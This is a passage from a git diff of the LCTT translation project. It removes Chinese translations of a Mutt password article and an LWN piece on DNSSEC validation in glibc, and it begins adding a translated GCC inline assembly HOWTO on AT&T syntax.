-如果你知道任何使用Mutt的安全技巧,随时分享他。
-
---------------------------------------------------------------------------------
-
-via: http://xmodulo.com/mutt-email-client-encrypted-passwords.html
-
-作者:[Dan Nanni][a]
-译者:[wyangsun](https://github.com/wyangsun)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://xmodulo.com/author/nanni
-[1]:http://xmodulo.com/gmail-command-line-linux-alpine.html
-[2]:http://dev.mutt.org/trac/wiki/MuttGuide/UseGPG
diff --git a/translated/tech/20151206 Supporting secure DNS in glibc.md b/translated/tech/20151206 Supporting secure DNS in glibc.md
deleted file mode 100644
index c66a28257c..0000000000
--- a/translated/tech/20151206 Supporting secure DNS in glibc.md
+++ /dev/null
@@ -1,46 +0,0 @@
-通过修改 glibc 支持 DNS 加密
-========================
-
-感谢:Jonathan Corbet
-
-域名解析系统(DNS)是因特网安全许多薄弱环节之一;可以误导应用程序所访问的主机相应的 IP 地址。也就是说,会连接到错误的位置,可以引发中间人攻击以及更多攻击。而 DNSSEC 扩展协议是通过为 DNS 信息建立一条加密的可信通道来解决这个漏洞。在正确地配置好 DNSSEC 后,应用程序将可以得到可靠的主机查询信息。通过关于尝试将 DNSSEC 更好地集成到 GNU C 库里的讨论,确保 DNS 查询信息安全并不是那么简单。
-
-某种意义上来说,这个问题多年以前就解决了,我们可以配置一个本地域名服务实现完整的 DNSSEC 认证并允许应用程序通过 glibc 函数来使用该服务。DNSSEC 甚至还可以用于提高其他领域的安全性,比如,它可以携带 SSH 或 TLS 密钥指纹,让应用程序可以确认其在与正确的服务器通话。不过,当我们希望确认这条自称带有 DNSSEC 认证的 DNS 结果是不是真的已通过认证的时候 - 也就是说,当我们想依赖 DNSSEC 所承诺的安全的时候,事情变得有点复杂。
-
-/etc/resolv.conf 问题
-
-从 glibc 的角度来看,这个问题一部分是因为 glibc 本身并没有做 DNSSEC 认证。而是引用 /etc/resolv.conf 文件,从该文件里读出的服务器来做解析以及认证,再将结果返回给应用程序。如果应用程序使用底层 res_query() 接口,那结果中将会包含“已认证数据”(AD)标识(如果域名服务器设定了的话)以表示 DNSSEC 认证已经成功。但是 glibc 却完全不知道提供这些结果的域名服务器的信用,所以它其实并不能告诉应用程序结果是否真的可靠。
-
-由 glibc 的维护者 Carlos O'Donell 提出的建议是在 resolv.conf 文件里增加一个选项(dns-strip-dnssec-ad-bit)告诉 glibc 无条件移除 AD 标识。这个选项可以由各发行版设定,表示 DNSSEC 级别的 DNS 查询结果并不可靠。而一旦建立好合适的环境可以获得可靠的查询结果后,再移除这个选项。这样一来,虽然问题还没有完全解决,至少应用程序有依据来评价从 glibc 获取的 DNS 查询结果的可靠性。
-
-一个可靠的环境配置应该是什么样?标准情况应该和这个差不太多:有一个本地域名服务器,通过环路接口访问,作为访问 /etc/resolv.conf 文件的唯一入口。这个域名服务器应该配置来做认证,而在认证失败后就只是简单地不返回任何结果。绝大多数情况下,应用程序就不再需要关心 AD 标识,如果结果不可靠,应用程序就根本看不到。一些发行版已经偏向这种模型,不过情况仍然不像一些人所设想的没那么简单。
-
-其中一个问题是,这种方式将 /etc/resolv.conf 文件放到整个系统可信任度的中心。但是,在一个典型的 Linux 系统里,有无数的 DHCP 客户端、网络脚本以及其他更多,可以修改这个文件。就像 Paul Wouters 所指出的,在短时间内锁定这个文件是不可能的。有时候这种改变是必须的:在一个无盘系统启动的时候,在自身的域名服务器启动之前也是需要域名服务的;一个系统的整个 DNS 环境也会根据所连接的网络不同而有所改变;运行在容器里的系统也最好是配制成使用宿主机的域名服务器;等等。
-
-所以,现在一般认为,现有系统里的 /etc/resolv.conf 文件并不可信。于是有人提出增加另一个配置文件(/etc/secure-resolv.conf 或其他什么),但这并没有从根本上解决问题。除此之外,有些参与人员觉得就算有一个运行在环路接口上的域名服务器也不是真正可靠,比如 Zack Weinberg 甚至建议系统管理员可以有意禁用 DNSSEC 认证。
-
-既然当前系统里的配置不足以信任,那可以这样推断,在情况有改善能够取得可信的结果后,glibc 需要有一种方式来通知应用程序。可以是上面讨论的屏蔽 AD 标识的方式(或者与之相反,增加一个显示的“此域名服务器可以信任”选项);当然,这都需要一定程度上锁定系统以免 /etc/resolv.conf 受到任何不可预计的修改。按 Petr Spacek 的建议,还有一种引申方式,就是提供一种途径允许应用程序查询 glibc 当前通讯的是不是本地域名服务器。
-
-在 glibc 里来处理?
-
-另一种方式是去掉域名服务器,而是让 glibc 本身来做 DNSSEC 认证。不过,把这么大一坨加密相关代码放进 glibc 也是有很大阻力。这样将增加库本身的大小,从而感觉会增加使用它的应用程序的受攻击面积。这个方向再引申一下,由 Zack 提出的建议,可以把认证相关代码放到域名服务缓冲守护进程(nscd)里。因为 nscd 也是 glibc 的一部分,由 glibc 开发人员维护,因此在一定程度上可以相信能正确执行 DNSSEC 认证。而且 nscd 的通讯 socket 所在位置也是公开的,所以可以不考虑 /etc/resolv.conf 问题。不过,Carlos 担心这种方式不能让那些不想使用 nscd 缓存功能的用户所接受;在他看来,基本可以排除 nscd 的方式。
-
-所以,至少近期内,glibc 不太可能全部执行带 DNSSEC 认证的整个查询过程。这意味着,如果一个有安全考虑的应用要使用 glibc 库来查询域名,库将需要提供一个标识来评价从独立域名服务器返回的结果有多大程度的可靠性。这几乎肯定需要发行商或系统管理员做出一些明确的改动。就像 Simo Sorce 说的那样:
-
-如果 glibc 不使用明确的配置选项来通知应用程序它所用的域名解析是可信的,不会有什么用。。。不改一下还有很大弊端,因为应用程序开发者将马上认识到他们不能信任从 glibc 获取的任何信息,从而在处理 DNSSEC 相关信息时就简单地不用它。
-
-要配置一个系统能正常使用 DNSSEC 需要改动该系统的很多组件 - 这是一个发行版范围的问题,需要时间来完全解决。在这个转变过程中 glibc 所扮演的角色很可能会比较小,但是很重要的一部分:如果应用程序不实现一套自己的域名解析代码,glibc 很可能是保证 DNS 结果可信的唯一方式。在一个系统中运行多个 DNSSEC 实现方式看起来不像是一种安全的方式,所以最好还是把事情做对了。
-
-glibc 项目目前并没有确定用哪种方式来做这个事情,虽然从 /etc/resolv.conf 文件里的某些标记看上去快好了。这种改动应该需要发布新版本;考虑到 glibc 开发的保守天性,很可能来不及加入预计二月份发布的 2.23 版本了。所以 glibc 中暂时还不会有更高安全性的 DNSSEC ,不过在这个方向上也有一些进展了。
-
----------------------------
-
-via: https://lwn.net/Articles/663474/
-
-作者:Jonathan Corbet
-
-译者:[zpl1025](https://github.com/zpl1025)
-
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
diff --git a/translated/tech/20151220 GCC-Inline-Assembly-HOWTO.md b/translated/tech/20151220 GCC-Inline-Assembly-HOWTO.md
new file mode 100644
index 0000000000..e0e1fc6d50
--- /dev/null
+++ b/translated/tech/20151220 GCC-Inline-Assembly-HOWTO.md
@@ -0,0 +1,632 @@
+* * *
+
+# GCC 内联汇编 HOWTO
+
+v0.1, 01 March 2003.
+* * *
+
+_本 HOWTO 文档将讲解 GCC 提供的内联汇编特性的用途和用法。对于阅读这篇文章,这里只有两个前提要求,很明显,就是 x86 汇编语言和 C 语言的基本认识。_
+
+* * *
+
+## 1. 简介
+
+## 1.1 版权许可
+
+Copyright (C)2003 Sandeep S.
+
+本文档自由共享;你可以重新发布它,并且/或者在遵循自由软件基金会发布的 GNU 通用公共许可证下修改它;或者该许可证的版本 2 ,或者(按照你的需求)更晚的版本。
+
+发布这篇文档是希望它能够帮助别人,但是没有任何保证;甚至不包括可售性和适用于任何特定目的的保证。关于更详细的信息,可以查看 GNU 通用许可证。
+
+## 1.2 反馈校正
+
+请将反馈和批评一起提交给 [Sandeep.S](mailto:busybox@sancharnet.in) 。我将感谢任何一个指出本文档中错误和不准确之处的人;一被告知,我会马上改正它们。
+
+## 1.3 致谢
+
+我对提供如此棒的特性的 GNU 人们表示真诚的感谢。感谢 Mr.Pramode C E 所做的所有帮助。感谢在 Govt Engineering College 和 Trichur 的朋友们的精神支持和合作,尤其是 Nisha Kurur 和 Sakeeb S 。 感谢在 Gvot Engineering College 和 Trichur 的老师们的合作。
+
+另外,感谢 Phillip , Brennan Underwood 和 colin@nyx.net ;这里的许多东西都厚颜地直接取自他们的工作成果。
+
+* * *
+
+## 2. 概览
+
+在这里,我们将学习 GCC 内联汇编。这内联表示的是什么呢?
+
+我们可以要求编译器将一个函数的代码插入到调用者代码中函数被实际调用的地方。这样的函数就是内联函数。这听起来和宏差不多?这两者确实有相似之处。
+
+内联函数的优点是什么呢?
+
+这种内联方法可以减少函数调用开销。同时如果所有实参的值为常量,它们的已知值可以在编译期允许简化,因此并非所有的内联函数代码都需要被包含。代码大小的影响是不可预测的,这取决于特定的情况。为了声明一个内联函数,我们必须在函数声明中使用 `inline` 关键字。
+
+现在我们正处于一个猜测内联汇编到底是什么的点上。它只不过是一些写为内联函数的汇编程序。在系统编程上,它们方便、快速并且极其有用。我们主要集中学习(GCC)内联汇编函数的基本格式和用法。为了声明内联汇编函数,我们使用 `asm` 关键词。
+
+内联汇编之所以重要,主要是因为它可以操作并且使其输出通过 C 变量显示出来。正是因为此能力, "asm" 可以用作汇编指令和包含它的 C 程序之间的接口。
+
+* * *
+
+## 3. GCC 汇编语法
+
+GCC , Linux上的 GNU C 编译器,使用 **AT&T** / **UNIX** 汇编语法。在这里,我们将使用 AT&T 语法 进行汇编编码。如果你对 AT&T 语法不熟悉的话,请不要紧张,我会教你的。AT&T 语法和 Intel 语法的差别很大。我会给出主要的区别。
+
+1. 源操作数和目的操作数顺序
+
+ AT&T 语法的操作数方向和 Intel 语法的刚好相反。在Intel 语法中,第一操作数为目的操作数,第二操作数为源操作数,然而在 AT&T 语法中,第一操作数为源操作数,第二操作数为目的操作数。也就是说,
+
+ Intel 语法中的 "Op-code dst src" 变为
+
+ AT&T 语法中的 "Op-code src dst"。
+
+2. 寄存器命名
+
+ 寄存器名称有 % 前缀,即如果必须使用 eax,它应该用作 %eax。
+
+3. 立即数
+
+ AT&T 立即数以 ’$’ 为前缀。静态 "C" 变量 也使用 ’$’ 前缀。在 Intel 语法中,十六进制常量以 ’h’ 为后缀,然而AT&T不使用这种语法,这里我们给常量添加前缀 ’0x’。所以,对于十六进制,我们首先看到一个 ’$’,然后是 ’0x’,最后才是常量。
+
+4. 操作数大小
+
+ 在 AT&T 语法中,存储器操作数的大小取决于操作码名字的最后一个字符。操作码后缀 ’b’ 、’w’、’l’分别指明了字节(byte)(8位)、字(word)(16位)、长型(long)(32位)存储器引用。Intel 语法通过给存储器操作数添加’byte ptr’、 ’word ptr’ 和 ’dword ptr’前缀来实现这一功能。
+
+ 因此,Intel的 "mov al, byte ptr foo" 在 AT&T 语法中为 "movb foo, %al"。
+
+5. 存储器操作数
+
+ 在 Intel 语法中,基址寄存器包含在 ’[’ 和 ’]’ 中,然而在 AT&T 中,它们变为 ’(’ 和 ’)’。另外,在 Intel 语法中, 间接内存引用为
+
+ section:[base + index*scale + disp], 在 AT&T中变为
+
+ section:disp(base, index, scale)。
+
+ 需要牢记的一点是,当一个常量用于 disp 或 scale,不能添加’$’前缀。
+
+现在我们看到了 Intel 语法和 AT&T 语法之间的一些主要差别。我仅仅写了它们差别的一部分而已。关于更完整的信息,请参考 GNU 汇编文档。现在为了更好地理解,我们可以看一些示例。
+
+> `
+>
+>